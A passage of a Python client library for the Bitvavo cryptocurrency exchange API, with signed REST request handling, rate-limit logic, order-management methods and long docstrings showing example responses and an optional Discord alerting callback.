I made this so you can see what kind of function you'll need to stick into the websocket functions.
"""
if isinstance(response, Dict):
# instead of printing, you could save the object to a file:
import json
from pathlib import Path
HERE = Path.cwd() # root of your project folder
filepath = HERE / "your_output.json"
# a = append; figure out yourself to create multiple callback functions, probably one for each type of call that you want to make
with filepath.open("a") as file:
file.write(json.dumps(response))
elif isinstance(response, List):
# Whether `item` is a list or a dict doesn't matter to print
for item in response:
print(item)
# You can also copy-paste stuff to write it to a file or something
# of maybe mess around with sqlite. ¯\_(ツ)_/¯
else:
# Normally, I would raise an exception here, but the websocket Thread would just eat it up anyway :/
# I don't even know if this log will be shown to you.
# Yes, I haven't tested this function; it's just some off-the-cuff example to get you started.
logger.critical("what in the blazes did I just receive!?")
def error_callback_example(msg: errordict) -> None:
"""
When using the websocket, I really REALLY recommend using `ws.setErrorCallback(error_callback_example)`, instead of
using the default (yes, there is a default on_error function, but that just prints the error, which in practice
means it won't show for the user, as the websocket has a tendency to silently fail printing).
I would recommand adding some alerting mechanism, where the error isn't written to a log,
but to some external system instead, like Discord, Slack, Email, Signal, Telegram, etc
As I said, this is due to the websocket silently dropping python Exceptions and Bitvavo Errors.
I can't speak for all options (yet), but the Discord one was VERY easy (mostly due to me already having a Discord channel :p)
```shell
pip install discord-webhook
```
Create a webhook for some channel (look for the cog icon) and copy it into a `DISCORD_WEBHOOK` variable
```python
from discord_webhook import DiscordWebhook
# send the message directly to your discord channel! :D
DiscordWebhook(
url=DISCORD_WEBHOOK,
rate_limit_retry=True,
content=f"{msg}",
).execute()
```
"""
# easiest thing is to use the logger, but there's a good chance this message gets silently eaten.
logger.error(msg)
class Bitvavo:
"""
Example code to get your started:
```python
bitvavo = Bitvavo(
{
"APIKEY": "$YOUR_API_KEY",
"APISECRET": "$YOUR_API_SECRET",
"RESTURL": "https://api.bitvavo.com/v2",
"WSURL": "wss://ws.bitvavo.com/v2/",
"ACCESSWINDOW": 10000,
"DEBUGGING": True,
},
)
time_dict = bitvavo.time()
```
"""
def __init__(self, options: Dict[str, Union[str, int]] = {}):
_options = {k.upper(): v for k, v in options.items()}
self.base: str = str(_options.get("RESTURL", "https://api.bitvavo.com/v2"))
self.wsUrl: str = str(_options.get("WSURL", "wss://ws.bitvavo.com/v2/"))
self.ACCESSWINDOW = ms(_options.get("ACCESSWINDOW", 10000))
self.APIKEY = str(_options.get("APIKEY", ""))
self.APISECRET = str(_options.get("APISECRET", ""))
self.rateLimitRemaining: int = 1000
self.rateLimitResetAt: ms = 0
# TODO(NostraDavid) for v2: remove this functionality - logger.debug is a level that can be set
self.debugging = bool(_options.get("DEBUGGING", False))
def calcLag(self) -> ms:
"""
Calculate the time difference between the client and server; use this value with BITVAVO_API_UPGRADED_LAG,
when you make an api call, to precent 304 errors.
Raises KeyError if time() returns an error dict.
"""
lag_list = [
self.time()["time"] - time_ms(),
self.time()["time"] - time_ms(),
self.time()["time"] - time_ms(),
self.time()["time"] - time_ms(),
self.time()["time"] - time_ms(),
self.time()["time"] - time_ms(),
self.time()["time"] - time_ms(),
self.time()["time"] - time_ms(),
self.time()["time"] - time_ms(),
self.time()["time"] - time_ms(),
]
return ms(sum(lag_list) / len(lag_list))
def getRemainingLimit(self) -> int:
"""Get the remaing rate limit
---
Returns:
```python
1000 # or lower
```
"""
return self.rateLimitRemaining
def updateRateLimit(self, response: Union[anydict, errordict]) -> None:
"""
Update the rate limited
If you're banned, use the errordict to sleep until you're not banned
If you're not banned, then use the received headers to update the variables.
"""
if "errorCode" in response:
if response["errorCode"] == 105:
self.rateLimitRemaining = 0
# rateLimitResetAt is a value that's stripped from a string.
# Kind of a terrible way to pass that information, but eh, whatever, I guess...
# Anyway, here is the string that's being pulled apart:
# "Your IP or API key has been banned for not respecting the rate limit. The ban expires at ${expiryInMs}""
self.rateLimitResetAt = ms(response["error"].split(" at ")[1].split(".")[0])
timeToWait = time_to_wait(self.rateLimitResetAt)
logger.warning(
"banned",
info={
"wait_time_seconds": timeToWait + 1,
"until": (dt.datetime.now() + dt.timedelta(seconds=timeToWait + 1)).isoformat(),
},
)
logger.info("napping-until-ban-lifted")
time.sleep(timeToWait + 1) # plus one second to ENSURE we're able to run again.
if "Bitvavo-Ratelimit-Remaining" in response:
self.rateLimitRemaining = int(response["Bitvavo-Ratelimit-Remaining"])
if "Bitvavo-Ratelimit-ResetAt" in response:
self.rateLimitResetAt = int(response["Bitvavo-Ratelimit-ResetAt"])
def publicRequest(
self,
url: str,
rateLimitingWeight: int = 1,
) -> Union[List[anydict], List[List[str]], intdict, strdict, anydict, errordict]:
"""Execute a request to the public part of the API; no API key and/or SECRET necessary.
Will return the reponse as one of three types.
---
Args:
```python
url: str = "https://api.bitvavo.com/v2/time" # example of how the url looks like
```
---
Returns:
```python
# either of one:
Dict[str, Any]
List[Dict[str, Any]]
List[List[str]]
```
"""
if (self.rateLimitRemaining - rateLimitingWeight) <= BITVAVO_API_UPGRADED.RATE_LIMITING_BUFFER:
self.sleep_until_can_continue()
if self.debugging:
logger.debug(
"api-request",
info={
"url": url,
"with_api_key": bool(self.APIKEY != ""),
"public_or_private": "public",
},
)
if self.APIKEY != "":
now = time_ms() + BITVAVO_API_UPGRADED.LAG
sig = createSignature(now, "GET", url.replace(self.base, ""), {}, self.APISECRET)
headers = {
"Bitvavo-Access-Key": self.APIKEY,
"Bitvavo-Access-Signature": sig,
"Bitvavo-Access-Timestamp": str(now),
"Bitvavo-Access-Window": str(self.ACCESSWINDOW),
}
r = get(url, headers=headers, timeout=(self.ACCESSWINDOW / 1000))
else:
r = get(url, timeout=(self.ACCESSWINDOW / 1000))
if "error" in r.json():
self.updateRateLimit(r.json())
else:
self.updateRateLimit(dict(r.headers))
return r.json() # type:ignore
def privateRequest(
self,
endpoint: str,
postfix: str,
body: anydict,
method: str = "GET",
rateLimitingWeight: int = 1,
) -> Union[List[anydict], List[List[str]], intdict, strdict, anydict, Any, errordict]:
"""Execute a request to the private part of the API. API key and SECRET are required.
Will return the reponse as one of three types.
---
Args:
# TODO(NostraDavid) fill these in
```python
endpoint: str = "/order"
postfix: str = "" # ?key=value&key2=another_value&...
body: anydict = {"market" = "BTC-EUR", "side": "buy", "orderType": "limit"} # for example
method: Optional[str] = "POST" # Defaults to "GET"
```
---
Returns:
```python
# either of one:
Dict[str, Any]
List[Dict[str, Any]]
List[List[str]]
```
"""
if (self.rateLimitRemaining - rateLimitingWeight) <= BITVAVO_API_UPGRADED.RATE_LIMITING_BUFFER:
self.sleep_until_can_continue()
# if this method breaks: add `= {}` after `body:Dict``
now = time_ms() + BITVAVO_API_UPGRADED.LAG
sig = createSignature(now, method, (endpoint + postfix), body, self.APISECRET)
url = self.base + endpoint + postfix
headers = {
"Bitvavo-Access-Key": self.APIKEY,
"Bitvavo-Access-Signature": sig,
"Bitvavo-Access-Timestamp": str(now),
"Bitvavo-Access-Window": str(self.ACCESSWINDOW),
}
if self.debugging:
logger.debug(
"api-request",
info={
"url": url,
"with_api_key": bool(self.APIKEY != ""),
"public_or_private": "private",
"method": method,
},
)
if method == "DELETE":
r = delete(url, headers=headers, timeout=(self.ACCESSWINDOW / 1000))
elif method == "POST":
r = post(url, headers=headers, json=body, timeout=(self.ACCESSWINDOW / 1000))
elif method == "PUT":
r = put(url, headers=headers, json=body, timeout=(self.ACCESSWINDOW / 1000))
else: # method == "GET"
r = get(url, headers=headers, timeout=(self.ACCESSWINDOW / 1000))
if "error" in r.json():
self.updateRateLimit(r.json())
else:
self.updateRateLimit(dict(r.headers))
return r.json()
def sleep_until_can_continue(self):
napTime = time_to_wait(self.rateLimitResetAt)
logger.warning("rate-limit-reached", rateLimitRemaining=self.rateLimitRemaining)
logger.info("napping-until-reset", napTime=napTime,
currentTime=dt.datetime.now().isoformat(),
targetDatetime=dt.datetime.fromtimestamp(self.rateLimitResetAt / 1000.0).isoformat())
time.sleep(napTime + 1) # +1 to add a tiny bit of buffer time
def time(self) -> intdict:
"""Get server-time, in milliseconds, since 1970-01-01
---
Examples:
* https://api.bitvavo.com/v2/time
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{"time": 1539180275424 }
```
"""
return self.publicRequest(f"{self.base}/time")
def markets(self, options: strdict) -> Union[List[anydict], anydict, errordict]:
"""Get all available markets with some meta-information, unless options is given a `market` key.
Then you will get a single market, instead of a list of markets.
---
Examples:
* https://api.bitvavo.com/v2/markets
* https://api.bitvavo.com/v2/markets?market=BTC-EUR
* https://api.bitvavo.com/v2/markets?market=SHIB-EUR
---
Args:
```python
# Choose one:
options={} # returns all markets
options={"market": "BTC-EUR"} # returns only the BTC-EUR market
# If you want multiple markets, but not all, make multiple calls
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
[
{
"market": "BTC-EUR",
"status": "trading",
"base": "BTC",
"quote": "EUR",
"pricePrecision": "5",
"minOrderInQuoteAsset": "10",
"minOrderInBaseAsset": "0.001",
"orderTypes": [
"market",
"limit",
"stopLoss",
"stopLossLimit",
"takeProfit",
"takeProfitLimit"
]
}
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/markets{postfix}")
def assets(self, options: strdict) -> Union[List[anydict], anydict]:
"""Get all available assets, unless `options` is given a `symbol` key.
Then you will get a single asset, instead of a list of assets.
---
Examples:
* https://api.bitvavo.com/v2/assets
* https://api.bitvavo.com/v2/assets?symbol=BTC
* https://api.bitvavo.com/v2/assets?symbol=SHIB
* https://api.bitvavo.com/v2/assets?symbol=ADA
* https://api.bitvavo.com/v2/assets?symbol=EUR
---
Args:
```python
# pick one
options={} # returns all assets
options={"symbol": "BTC"} # returns a single asset (the one of Bitcoin)
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
[
{
"symbol": "BTC",
"name": "Bitcoin",
"decimals": 8,
"depositFee": "0",
"depositConfirmations": 10,
"depositStatus": "OK",
"withdrawalFee": "0.2",
"withdrawalMinAmount": "0.2",
"withdrawalStatus": "OK",
"networks": ["Mainnet"],
"message": ""
}
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/assets{postfix}")
def book(self, market: str, options: intdict) -> Union[Dict[str, Union[str, int, List[str]]], errordict]:
"""Get a book (with two lists: asks and bids, as they're called)
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/book
* https://api.bitvavo.com/v2/SHIB-EUR/book?depth=10
* https://api.bitvavo.com/v2/ADA-EUR/book?depth=0
---
Args:
```python
market="ADA-EUR"
options={"depth": 3} # returns the best 3 asks and 3 bids
options={} # same as `{"depth": 0}`; returns all bids and asks for that book
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"market": "ADA-EUR",
"nonce": 10378032,
"bids": [["1.1908", "600"], ["1.1902", "4091.359809"], ["1.1898", "7563"]],
"asks": [["1.1917", "2382.166997"], ["1.1919", "440.7"], ["1.192", "600"]],
}
# Notice how each bid and ask is also a list
bid = ["1.1908", "600"] # the first bid from the bids list
price = bid[0] # the price for one coin/token
size = bid[1] # how many tokens are asked (or bidded, in this case)
result = price * size
assert result == 714.48 # EUR can be gained from this bid if it's sold (minus the fee)
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/{market}/book{postfix}")
def publicTrades(self, market: str, options: Dict[str, Union[str, int]]) -> Union[List[anydict], errordict]:
"""Publically available trades
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/trades
* https://api.bitvavo.com/v2/SHIB-EUR/trades?limit=10
* https://api.bitvavo.com/v2/ADA-EUR/trades?tradeIdFrom=532f4d4d-f545-4a2d-a175-3d37919cb73c
* https://api.bitvavo.com/v2/NANO-EUR/trades
---
Args:
```python
market="NANO-EUR"
# note that any of these `options` are optional
# use `int(time.time() * 1000)` to get current timestamp in milliseconds
# or `int(datetime.datetime.now().timestamp()*1000)`
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"timestamp": 1542967486256,
"id": "57b1159b-6bf5-4cde-9e2c-6bd6a5678baf",
"amount": "0.1",
"price": "5012",
"side": "sell"
}
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/{market}/trades{postfix}", 5)
def candles(
self,
market: str,
interval: str,
options: Dict[str, Union[str, int]],
) -> Union[List[List[str]], errordict]:
"""Get up to 1440 candles for a market, with a specific interval (candle size)
Extra reading material: https://en.wikipedia.org/wiki/Candlestick_chart
## WARNING: RETURN TYPE IS WEIRD - CHECK BOTTOM OF THIS TEXT FOR EXPLANATION
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/candles?interval=1h&limit=100
---
Args:
```python
market="BTC-EUR"
interval="1h" # Choose: 1m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d
# use `int(time.time() * 1000)` to get current timestamp in milliseconds
# or `int(datetime.datetime.now().timestamp()*1000)`
options={
"limit": [ 1 .. 1440 ], default 1440
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8640000000000000
}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
[
# For whatever reason, you're getting a list of lists; no keys,
# so here is the explanation of what's what.
# timestamp, open, high, low, close, volume
[1640815200000, "41648", "41859", "41519", "41790", "12.1926685"],
[1640811600000, "41771", "41780", "41462", "41650", "13.90917427"],
[1640808000000, "41539", "42083", "41485", "41771", "14.39770267"],
[1640804400000, "41937", "41955", "41449", "41540", "23.64498292"],
[1640800800000, "41955", "42163", "41807", "41939", "10.40093845"],
]
```
"""
options["interval"] = interval
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/{market}/candles{postfix}")
def tickerPrice(self, options: strdict) -> Union[List[strdict], strdict]:
"""Get the current price for each market
---
Examples:
* https://api.bitvavo.com/v2/ticker/price
* https://api.bitvavo.com/v2/ticker/price?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/price?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/price?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/price?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/price?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
# Note that `price` is unconverted
[
{"market": "1INCH-EUR", "price": "2.1594"},
{"market": "AAVE-EUR", "price": "214.42"},
{"market": "ADA-BTC", "price": "0.000021401"},
{"market": "ADA-EUR", "price": "1.2011"},
{"market": "ADX-EUR", "price": "0.50357"},
{"market": "AE-BTC", "price": "0.0000031334"},
{"market": "AE-EUR", "price": "0.064378"},
{"market": "AION-BTC", "price": "0.000004433"},
{"market": "AION-EUR", "price": "0.1258"},
{"market": "AKRO-EUR", "price": "0.020562"},
{"market": "ALGO-EUR", "price": "1.3942"},
# and another 210 markets below this point
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/ticker/price{postfix}")
def tickerBook(self, options: strdict) -> Union[List[strdict], strdict]:
"""Get current bid/ask, bidsize/asksize per market
---
Examples:
* https://api.bitvavo.com/v2/ticker/book
* https://api.bitvavo.com/v2/ticker/book?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/book?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/book?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/book?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/book?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
[
{"market": "1INCH-EUR", "bid": "2.1534", "ask": "2.1587", "bidSize": "194.8", "askSize": "194.8"},
{"market": "AAVE-EUR", "bid": "213.7", "ask": "214.05", "bidSize": "212.532", "askSize": "4.77676965"},
{"market": "ADA-EUR", "bid": "1.2", "ask": "1.2014", "bidSize": "415.627597", "askSize": "600"},
{"market": "ADX-EUR", "bid": "0.49896", "ask": "0.50076", "bidSize": "1262.38216882", "askSize": "700.1"},
{"market": "AION-EUR", "bid": "0.12531", "ask": "0.12578", "bidSize": "3345", "askSize": "10958.49228653"},
# and another 215 markets below this point
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/ticker/book{postfix}")
def ticker24h(self, options: strdict) -> Union[List[anydict], anydict, errordict]:
"""Get current bid/ask, bidsize/asksize per market
---
Examples:
* https://api.bitvavo.com/v2/ticker/24h
* https://api.bitvavo.com/v2/ticker/24h?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
```
---
Rate Limit Weight:
```python
25 # if no market option is used
1 # if a market option is used
```
---
Returns:
```python
[
{
"market": "1INCH-EUR",
"open": "2.2722",
"high": "2.2967",
"low": "2.1258",
"last": "2.1552",
"volume": "92921.3792573",
"volumeQuote": "204118.95",
"bid": "2.1481",
"bidSize": "392.46514457",
"ask": "2.1513",
"askSize": "195.3",
"timestamp": 1640819573777
},
{
"market": "AAVE-EUR",
"open": "224.91",
"high": "228.89",
"low": "210.78",
"last": "213.83",
"volume": "5970.52391148",
"volumeQuote": "1307777.47",
"bid": "213.41",
"bidSize": "2.61115011",
"ask": "213.85",
"askSize": "1.864",
"timestamp": 1640819573285
},
# and then 219 more markets
]
```
"""
rateLimitingWeight = 25
if "market" in options:
rateLimitingWeight = 1
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/ticker/24h{postfix}", rateLimitingWeight)
def placeOrder(self, market: str, side: str, orderType: str, body: anydict) -> anydict:
"""Place a new order on the exchange
---
Args:
```python
market="SHIB-EUR"
side="buy" # Choose: buy, sell
# For market orders either `amount` or `amountQuote` is required
orderType="market" # Choose: market, limit, stopLoss, stopLossLimit, takeProfit, takeProfitLimit
body={
"amount": "1.567",
"amountQuote": "5000",
# GTC orders will remain on the order book until they are filled or canceled.
# IOC orders will fill against existing orders, but will cancel any remaining amount after that.
# FOK orders will fill against existing orders in its entirety, or will be canceled (if the entire order cannot be filled).
"timeInForce": "GTC", # Choose: GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
# 'decrementAndCancel' decrements both orders by the amount that would have been filled, which in turn cancels the smallest of the two orders.
# 'cancelOldest' will cancel the entire older order and places the new order.
# 'cancelNewest' will cancel the order that is submitted.
# 'cancelBoth' will cancel both the current and the old order.
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"disableMarketProtection": false,
"responseRequired": true # setting this to `false` will return only an 'acknowledged', and be faster
}
# For limit orders `amount` and `price` are required.
orderType="limit" # Choose: market, limit, stopLoss, stopLossLimit, takeProfit, takeProfitLimit
body={
"amount": "1.567",
"price": "6000",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": True
}
orderType="stopLoss"
# or
orderType="takeProfit"
body={
"amount": "1.567",
"amountQuote": "5000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"disableMarketProtection": false,
"responseRequired": true
}
orderType="stopLossLimit"
# or
orderType="takeProfitLimit"
body={
"amount": "1.567",
"price": "6000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": true
}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": false,
"disableMarketProtection": true
}
```
"""
body["market"] = market
body["side"] = side
body["orderType"] = orderType
return self.privateRequest("/order", "", body, "POST")
def updateOrder(self, market: str, orderId: str, body: anydict) -> anydict:
"""Update an existing order for a specific market. Make sure that at least one of the optional parameters is set,
otherwise nothing will be updated.
---
Args:
```python
market="BTC-EUR"
orderId="95d92d6c-ecf0-4960-a608-9953ef71652e"
body={
"amount": "1.567",
"amountRemaining": "1.567",
"price": "6000",
"triggerAmount": "4000", # only for stop orders
# GTC orders will remain on the order book until they are filled or canceled.
# IOC orders will fill against existing orders, but will cancel any remaining amount after that.
# FOK orders will fill against existing orders in its entirety, or will be canceled (if the entire order cannot be filled).
"timeInForce": "GTC", # Choose: GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
# 'decrementAndCancel' decrements both orders by the amount that would have been filled, which in turn cancels the smallest of the two orders.
# 'cancelOldest' will cancel the entire older order and places the new order.
# 'cancelNewest' will cancel the order that is submitted.
# 'cancelBoth' will cancel both the current and the old order.
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": true # setting this to `false` will return only an 'acknowledged', and be faster
}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
```
"""
body["market"] = market
body["orderId"] = orderId
return self.privateRequest("/order", "", body, "PUT")
def cancelOrder(self, market: str, orderId: str) -> strdict:
"""Cancel an existing order for a specific market
---
Args:
```python
market="BTC-EUR"
orderId="a4a5d310-687c-486e-a3eb-1df832405ccd"
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{"orderId": "2e7ce7fc-44e2-4d80-a4a7-d079c4750b61"}
```
"""
postfix = createPostfix({"market": market, "orderId": orderId})
return self.privateRequest("/order", postfix, {}, "DELETE")
def getOrder(self, market: str, orderId: str) -> Union[List[anydict], errordict]:
"""Get an existing order for a specific market
---
Args:
```python
market="BTC-EUR"
orderId="ff403e21-e270-4584-bc9e-9c4b18461465"
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
```
"""
postfix = createPostfix({"market": market, "orderId": orderId})
return self.privateRequest("/order", postfix, {}, "GET")
def getOrders(self, market: str, options: anydict) -> Union[List[anydict], errordict]:
"""Get multiple existing orders for a specific market
---
Args:
```python
market="BTC-EUR"
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
# A whole list of these
[
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
]
```
"""
options["market"] = market
postfix = createPostfix(options)
return self.privateRequest("/orders", postfix, {}, "GET", 5)
def cancelOrders(self, options: anydict) -> Union[List[strdict], errordict]:
"""Cancel all existing orders for a specific market (or account)
---
Args:
```python
options={} # WARNING - WILL REMOVE ALL OPEN ORDERS ON YOUR ACCOUNT!
options={"market":"BTC-EUR"} # Removes all open orders for this market
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
# A whole list of these
[
{"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6"}
]
```
"""
postfix = createPostfix(options)
return self.privateRequest("/orders", postfix, {}, "DELETE")
def ordersOpen(self, options: anydict) -> Union[List[anydict], errordict]:
"""Get all open orders, either for all markets, or a single market
---
Args:
```python
options={} # Gets all open orders for all markets
options={"market":"BTC-EUR"} # Get open orders for this market
```
---
Rate Limit Weight:
```python
25 # if no market option is used
1 # if a market option is used
```
---
Returns:
```python
[
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
]
```
"""
rateLimitingWeight = 25
if "market" in options:
rateLimitingWeight = 1
postfix = createPostfix(options)
return self.privateRequest("/ordersOpen", postfix, {}, "GET", rateLimitingWeight)
def trades(self, market: str, options: anydict) -> Union[List[anydict], errordict]:
"""Get all historic trades from this account
---
Args:
```python
market="BTC-EUR"
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"id": "108c3633-0276-4480-a902-17a01829deae",
"orderId": "1d671998-3d44-4df4-965f-0d48bd129a1b",
"timestamp": 1542967486256,
"market": "BTC-EUR",
"side": "buy",
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
]
